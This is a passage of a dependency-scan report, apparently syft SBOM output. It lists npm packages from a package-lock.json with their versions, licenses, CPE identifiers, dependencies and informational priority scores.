SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: dunder-proto 1.0.1' + title: dunder-proto 1.0.1 + description: 'Package discovered: dunder-proto 1.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 23d9641db70f3051 + name: dunder-proto + version: 1.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:dunder-proto:dunder-proto:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dunder-proto:dunder_proto:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dunder_proto:dunder-proto:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dunder_proto:dunder_proto:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dunder:dunder-proto:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dunder:dunder_proto:1.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/dunder-proto@1.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz + integrity: sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A== + dependencies: + call-bind-apply-helpers: ^1.0.1 + es-errors: ^1.3.0 + gopd: ^1.2.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: eae177c358a69822 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: duplexify 4.1.3' + title: duplexify 4.1.3 + description: 'Package discovered: duplexify 4.1.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 91c59a4a431b283f + name: duplexify + version: 4.1.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:duplexify:duplexify:4.1.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/duplexify@4.1.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/duplexify/-/duplexify-4.1.3.tgz + integrity: sha512-M3BmBhwJRZsSx38lZyhE53Csddgzl5R7xGJNk7CVddZD6CcmwMCH8J+7AprIrQKH7TonKxaCjcv27Qmf+sQ+oA== + dependencies: + end-of-stream: ^1.4.1 + inherits: ^2.0.3 + readable-stream: ^3.1.1 + stream-shift: ^1.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d3b8cfaa5ee0e8d1 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: eastasianwidth 0.2.0' + title: eastasianwidth 0.2.0 + description: 'Package discovered: eastasianwidth 0.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e7e9dd6a07994e54 + name: eastasianwidth + version: 0.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:eastasianwidth:eastasianwidth:0.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/eastasianwidth@0.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz + integrity: sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: cb63ab5ab6733afe + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: ecdsa-sig-formatter 1.0.11' + title: ecdsa-sig-formatter 1.0.11 + description: 'Package discovered: ecdsa-sig-formatter 1.0.11' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4ed0ded14e893339 + name: ecdsa-sig-formatter + version: 1.0.11 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:ecdsa-sig-formatter:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ecdsa-sig-formatter:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ecdsa_sig_formatter:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ecdsa_sig_formatter:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ecdsa-sig:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ecdsa-sig:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ecdsa_sig:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ecdsa_sig:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ecdsa:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ecdsa:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/ecdsa-sig-formatter@1.0.11 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/ecdsa-sig-formatter/-/ecdsa-sig-formatter-1.0.11.tgz + integrity: sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ== + dependencies: + safe-buffer: ^5.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 3d3ef9aed82705e2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: editorconfig 1.0.7' + title: editorconfig 1.0.7 + description: 'Package discovered: editorconfig 1.0.7' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 122ede063714b5b3 + name: editorconfig + version: 1.0.7 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:editorconfig:editorconfig:1.0.7:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/editorconfig@1.0.7 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/editorconfig/-/editorconfig-1.0.7.tgz + integrity: sha512-e0GOtq/aTQhVdNyDU9e02+wz9oDDM+SIOQxWME2QRjzRX5yyLAuHDE+0aE8vHb9XRC8XD37eO2u57+F09JqFhw== + dependencies: + '@one-ini/wasm': 0.1.1 + commander: ^10.0.0 + minimatch: ^9.0.1 + semver: ^7.5.3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9669afa378e5a35f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: ee-first 1.1.1' + title: ee-first 1.1.1 + description: 'Package discovered: ee-first 1.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e40c9e2062507e8a + name: ee-first + version: 1.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:ee-first:ee-first:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ee-first:ee_first:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ee_first:ee-first:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ee_first:ee_first:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ee:ee-first:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ee:ee_first:1.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/ee-first@1.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz + integrity: sha512-WMwm9LhRUo+WUaRN+vRuETqG89IgZphVSNkdFgeb6sS/E4OrDIN7t48CAewSHXc6C8lefD8KKfr5vY61brQlow== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 04d3ce47ab6baf5d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: electron-to-chromium 1.5.345' + title: electron-to-chromium 1.5.345 + description: 'Package discovered: electron-to-chromium 1.5.345' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: dc02d9fca5801675 + name: electron-to-chromium + version: 1.5.345 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:electron-to-chromium:electron-to-chromium:1.5.345:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:electron-to-chromium:electron_to_chromium:1.5.345:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:electron_to_chromium:electron-to-chromium:1.5.345:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:electron_to_chromium:electron_to_chromium:1.5.345:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:electron-to:electron-to-chromium:1.5.345:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:electron-to:electron_to_chromium:1.5.345:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:electron_to:electron-to-chromium:1.5.345:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:electron_to:electron_to_chromium:1.5.345:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:electron:electron-to-chromium:1.5.345:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:electron:electron_to_chromium:1.5.345:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/electron-to-chromium@1.5.345 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.345.tgz + integrity: sha512-F9JXQGiMrz6yVNPI2qOVPvB9HzjH5cGzhs8oJ6A28V5L/YnzN/0KsuiibqF+F1Fd9qxFzD1BUnYSd8JfULxTwg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d03ffa53b9f68b04 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: emoji-regex 10.6.0' + title: emoji-regex 10.6.0 + description: 'Package discovered: emoji-regex 10.6.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 20a2cf9e55a512fb + name: emoji-regex + version: 10.6.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:emoji-regex:emoji-regex:10.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji-regex:emoji_regex:10.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji_regex:emoji-regex:10.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji_regex:emoji_regex:10.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji:emoji-regex:10.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji:emoji_regex:10.6.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/emoji-regex@10.6.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/emoji-regex/-/emoji-regex-10.6.0.tgz + integrity: sha512-toUI84YS5YmxW219erniWD0CIVOo46xGKColeNQRgOzDorgBi1v4D71/OFzgD9GO2UGKIv1C3Sp8DAn0+j5w7A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 40ac25fe3302f6ab + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: emoji-regex 8.0.0' + title: emoji-regex 8.0.0 + description: 'Package discovered: emoji-regex 8.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6d4a27855f2a5940 + name: emoji-regex + version: 8.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:emoji-regex:emoji-regex:8.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji-regex:emoji_regex:8.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji_regex:emoji-regex:8.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji_regex:emoji_regex:8.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji:emoji-regex:8.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji:emoji_regex:8.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/emoji-regex@8.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz + integrity: sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2e49a0ba02ec88d9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: emoji-regex 9.2.2' + title: emoji-regex 9.2.2 + description: 'Package discovered: emoji-regex 9.2.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6d104925e5745212 + name: emoji-regex + version: 9.2.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:emoji-regex:emoji-regex:9.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji-regex:emoji_regex:9.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji_regex:emoji-regex:9.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji_regex:emoji_regex:9.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji:emoji-regex:9.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:emoji:emoji_regex:9.2.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/emoji-regex@9.2.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz + integrity: sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: dd09559c2dcfbb7e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: encodeurl 2.0.0' + title: encodeurl 2.0.0 + description: 'Package discovered: encodeurl 2.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c88c25f6c6e59773 + name: encodeurl + version: 2.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:encodeurl:encodeurl:2.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/encodeurl@2.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz + integrity: sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: aefcf9a0415c9a67 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: end-of-stream 1.4.5' + title: end-of-stream 1.4.5 + description: 'Package discovered: end-of-stream 1.4.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2e1781643534e89c + name: end-of-stream + version: 1.4.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:end-of-stream:end-of-stream:1.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:end-of-stream:end_of_stream:1.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:end_of_stream:end-of-stream:1.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:end_of_stream:end_of_stream:1.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:end-of:end-of-stream:1.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:end-of:end_of_stream:1.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:end_of:end-of-stream:1.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:end_of:end_of_stream:1.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:end:end-of-stream:1.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:end:end_of_stream:1.4.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/end-of-stream@1.4.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz + integrity: sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg== + dependencies: + once: ^1.4.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8a726054b0a99ad6 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: engine.io 6.6.7' + title: engine.io 6.6.7 + description: 'Package discovered: engine.io 6.6.7' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 560e37438ce30be1 + name: engine.io + version: 6.6.7 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:socket:engine.io:6.6.7:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/engine.io@6.6.7 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/engine.io/-/engine.io-6.6.7.tgz + integrity: sha512-DgOngfDKM2EviOH3Mr9m7ks1q8roetLy/IMmYthAYzbpInMbYc/GS+fWFA3rl1gvwKVsQrVV61fo5emD1y3OJQ== + dependencies: + '@types/cors': ^2.8.12 + '@types/node': '>=10.0.0' + '@types/ws': ^8.5.12 + accepts: ~1.3.4 + base64id: 2.0.0 + cookie: ~0.7.2 + cors: ~2.8.5 + debug: ~4.4.1 + engine.io-parser: ~5.2.1 + ws: ~8.18.3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 765ac1332452cd05 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: engine.io-client 6.6.4' + title: engine.io-client 6.6.4 + description: 'Package discovered: engine.io-client 6.6.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 930ef4784cebfb4a + name: engine.io-client + version: 6.6.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:socket:engine.io-client:6.6.4:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/engine.io-client@6.6.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/engine.io-client/-/engine.io-client-6.6.4.tgz + integrity: sha512-+kjUJnZGwzewFDw951CDWcwj35vMNf2fcj7xQWOctq1F2i1jkDdVvdFG9kM/BEChymCH36KgjnW0NsL58JYRxw== + dependencies: + '@socket.io/component-emitter': ~3.1.0 + debug: ~4.4.1 + engine.io-parser: ~5.2.1 + ws: ~8.18.3 + xmlhttprequest-ssl: ~2.1.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b2a7fb31422c2427 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: engine.io-parser 5.2.3' + title: engine.io-parser 5.2.3 + description: 'Package discovered: engine.io-parser 5.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b307d9bc2f957b2d + name: engine.io-parser + version: 5.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:engine.io-parser:engine.io-parser:5.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: 